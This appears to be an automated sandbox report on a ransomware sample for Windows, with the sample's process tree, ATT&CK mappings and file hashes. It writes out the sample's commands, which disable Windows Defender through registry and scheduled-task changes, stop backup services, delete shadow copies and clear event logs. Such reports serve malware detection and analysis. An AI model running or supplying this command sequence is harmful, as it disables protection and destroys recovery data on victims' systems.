Token: SeSystemEnvironmentPrivilege	4664	wmic.exe
Token: SeRemoteShutdownPrivilege	4664	wmic.exe
Token: SeUndockPrivilege	4664	wmic.exe
Token: SeManageVolumePrivilege	4664	wmic.exe
Token: 33	4664	wmic.exe
Token: 34	4664	wmic.exe
Token: 35	4664	wmic.exe
Token: 36	4664	wmic.exe
Token: SeIncreaseQuotaPrivilege	4664	wmic.exe
Token: SeSecurityPrivilege	4664	wmic.exe
Token: SeTakeOwnershipPrivilege	4664	wmic.exe
Token: SeLoadDriverPrivilege	4664	wmic.exe
Token: SeSystemProfilePrivilege	4664	wmic.exe
Token: SeSystemtimePrivilege	4664	wmic.exe
Token: SeProfSingleProcessPrivilege	4664	wmic.exe
Token: SeIncBasePriorityPrivilege	4664	wmic.exe
Token: SeCreatePagefilePrivilege	4664	wmic.exe
Token: SeBackupPrivilege	4664	wmic.exe
Token: SeRestorePrivilege	4664	wmic.exe
Token: SeShutdownPrivilege	4664	wmic.exe
Token: SeDebugPrivilege	4664	wmic.exe
Token: SeSystemEnvironmentPrivilege	4664	wmic.exe
Token: SeRemoteShutdownPrivilege	4664	wmic.exe
Token: SeUndockPrivilege	4664	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 2652	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	67
PID 2288 wrote to memory of 2652	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	67
PID 2288 wrote to memory of 2652	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	67
PID 2652 wrote to memory of 4080	2652	net.exe	69
PID 2652 wrote to memory of 4080	2652	net.exe	69
PID 2652 wrote to memory of 4080	2652	net.exe	69
PID 2288 wrote to memory of 2088	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	70
PID 2288 wrote to memory of 2088	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	70
PID 2288 wrote to memory of 2088	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	70
PID 2088 wrote to memory of 4800	2088	net.exe	72
PID 2088 wrote to memory of 4800	2088	net.exe	72
PID 2088 wrote to memory of 4800	2088	net.exe	72
PID 2288 wrote to memory of 4848	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	73
PID 2288 wrote to memory of 4848	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	73
PID 2288 wrote to memory of 4848	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	73
PID 4848 wrote to memory of 3892	4848	net.exe	75
PID 4848 wrote to memory of 3892	4848	net.exe	75
PID 4848 wrote to memory of 3892	4848	net.exe	75
PID 2288 wrote to memory of 3716	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	76
PID 2288 wrote to memory of 3716	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	76
PID 2288 wrote to memory of 3716	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	76
PID 3716 wrote to memory of 1360	3716	net.exe	78
PID 3716 wrote to memory of 1360	3716	net.exe	78
PID 3716 wrote to memory of 1360	3716	net.exe	78
PID 2288 wrote to memory of 2216	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	79
PID 2288 wrote to memory of 2216	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	79
PID 2288 wrote to memory of 2216	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	79
PID 2216 wrote to memory of 4192	2216	net.exe	81
PID 2216 wrote to memory of 4192	2216	net.exe	81
PID 2216 wrote to memory of 4192	2216	net.exe	81
PID 2288 wrote to memory of 4176	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	82
PID 2288 wrote to memory of 4176	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	82
PID 2288 wrote to memory of 4176	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	82
PID 4176 wrote to memory of 4952	4176	net.exe	84
PID 4176 wrote to memory of 4952	4176	net.exe	84
PID 4176 wrote to memory of 4952	4176	net.exe	84
PID 2288 wrote to memory of 1272	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	85
PID 2288 wrote to memory of 1272	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	85
PID 2288 wrote to memory of 1272	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	85
PID 1272 wrote to memory of 3592	1272	net.exe	87
PID 1272 wrote to memory of 3592	1272	net.exe	87
PID 1272 wrote to memory of 3592	1272	net.exe	87
PID 2288 wrote to memory of 4784	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	88
PID 2288 wrote to memory of 4784	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	88
PID 2288 wrote to memory of 4784	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	88
PID 4784 wrote to memory of 3588	4784	net.exe	90
PID 4784 wrote to memory of 3588	4784	net.exe	90
PID 4784 wrote to memory of 3588	4784	net.exe	90
PID 2288 wrote to memory of 4156	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	91
PID 2288 wrote to memory of 4156	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	91
PID 2288 wrote to memory of 4156	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	91
PID 4156 wrote to memory of 4348	4156	net.exe	93
PID 4156 wrote to memory of 4348	4156	net.exe	93
PID 4156 wrote to memory of 4348	4156	net.exe	93
PID 2288 wrote to memory of 4836	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	94
PID 2288 wrote to memory of 4836	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	94
PID 2288 wrote to memory of 4836	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	94
PID 2288 wrote to memory of 4816	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	96
PID 2288 wrote to memory of 4816	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	96
PID 2288 wrote to memory of 4816	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	96
PID 2288 wrote to memory of 760	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	98
PID 2288 wrote to memory of 760	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	98
PID 2288 wrote to memory of 760	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	98
PID 2288 wrote to memory of 4604	2288	windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe	100

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe
"C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2652
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:4080
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2088
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:4800
- C:\Windows\SysWOW64\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:3892
- C:\Windows\SysWOW64\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3716
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:1360
- C:\Windows\SysWOW64\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:4192
- C:\Windows\SysWOW64\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4176
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:4952
- C:\Windows\SysWOW64\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1272
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:3592
- C:\Windows\SysWOW64\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4784
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:3588
- C:\Windows\SysWOW64\net.exe
  net.exe stop "UnistoreSvc_180d4" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4156
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_180d4" /y
    3⤵
    PID:4348
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:4836
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:4816
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:760
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:4604
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  PID:4524
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:4540
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:4796
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:4984
- C:\Windows\SysWOW64\sc.exe
  sc.exe config "UnistoreSvc_180d4" start= disabled
  2⤵
  - Launches sc.exe
  PID:3396
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3416
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3284
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4404
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:2784
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:4372
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4296
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1652
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2116
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:5036
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4460
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:4148
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:4284
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:524
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:1044
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:4656
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:4472
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:2172
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:4996
- C:\Windows\SysWOW64\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:664
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:3696
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:1772
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:2700
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:2076
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:1984
- C:\Windows\SysWOW64\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  - Modifies registry class
  PID:5080
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2996
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2524
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4024
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4864
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:4700
- C:\Windows\SysWOW64\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4200
- C:\Windows\SysWOW64\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4936
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\SysWOW64\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:3592
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3904
- C:\Windows\SysWOW64\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:4712
- - C:\Program Files\Windows Defender\MpCmdRun.exe
    "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
    3⤵
    - Deletes Windows Defender Definitions
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:4488
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:3060
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5072

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Impair Defenses

T1562

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ab38541540242ba9fb71156358025157

SHA1
cedfba99e410336c3bc004a20866a4d72315042c

SHA256
357d40a29946799b1113984c98d36e0c543df5bf295e9d0cd343c90244d1e4f5

SHA512
f228ea6ad096db1d3f6d003d2831c49235cd7d560de6789e22750463a3ab78b39978e132e41e84790beb52c8a58071cccd53792c6671ebf3356514b87c71ee82

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvgzo3cz.yxr.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2288-141-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-122-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-123-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-124-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-126-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-2245-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-1401-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-541-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/2288-121-0x00000000013B0000-0x00000000016C2000-memory.dmp

Filesize
3.1MB

Download
memory/4520-131-0x0000000006D20000-0x0000000006D30000-memory.dmp

Filesize
64KB

Download
memory/4520-235-0x0000000006D20000-0x0000000006D30000-memory.dmp

Filesize
64KB

Download
memory/4520-139-0x0000000007F20000-0x0000000007F6B000-memory.dmp

Filesize
300KB

Download
memory/4520-140-0x0000000008250000-0x00000000082C6000-memory.dmp

Filesize
472KB

Download
memory/4520-137-0x0000000007BD0000-0x0000000007F20000-memory.dmp

Filesize
3.3MB

Download
memory/4520-136-0x00000000072A0000-0x0000000007306000-memory.dmp

Filesize
408KB

Download
memory/4520-158-0x0000000009290000-0x00000000092C3000-memory.dmp

Filesize
204KB

Download
memory/4520-159-0x0000000009250000-0x000000000926E000-memory.dmp

Filesize
120KB

Download
memory/4520-164-0x00000000093C0000-0x0000000009465000-memory.dmp

Filesize
660KB

Download
memory/4520-165-0x000000007F340000-0x000000007F350000-memory.dmp

Filesize
64KB

Download
memory/4520-166-0x0000000009570000-0x0000000009604000-memory.dmp

Filesize
592KB

Download
memory/4520-138-0x0000000007330000-0x000000000734C000-memory.dmp

Filesize
112KB

Download
memory/4520-360-0x0000000009520000-0x000000000953A000-memory.dmp

Filesize
104KB

Download
memory/4520-365-0x0000000009510000-0x0000000009518000-memory.dmp

Filesize
32KB

Download
memory/4520-135-0x00000000071C0000-0x0000000007226000-memory.dmp

Filesize
408KB

Download
memory/4520-134-0x0000000007020000-0x0000000007042000-memory.dmp

Filesize
136KB

Download
memory/4520-130-0x0000000000EC0000-0x0000000000EF6000-memory.dmp

Filesize
216KB

Download
memory/4520-132-0x0000000007360000-0x0000000007988000-memory.dmp

Filesize
6.2MB

Download
memory/4520-133-0x0000000006D20000-0x0000000006D30000-memory.dmp

Filesize
64KB

Download
memory/5072-476-0x0000000000E90000-0x0000000000EA0000-memory.dmp

Filesize
64KB

Download
memory/5072-404-0x000000007E460000-0x000000007E470000-memory.dmp

Filesize
64KB

Download
memory/5072-386-0x0000000000E90000-0x0000000000EA0000-memory.dmp

Filesize
64KB

Download
memory/5072-385-0x0000000000E90000-0x0000000000EA0000-memory.dmp

Filesize
64KB

Download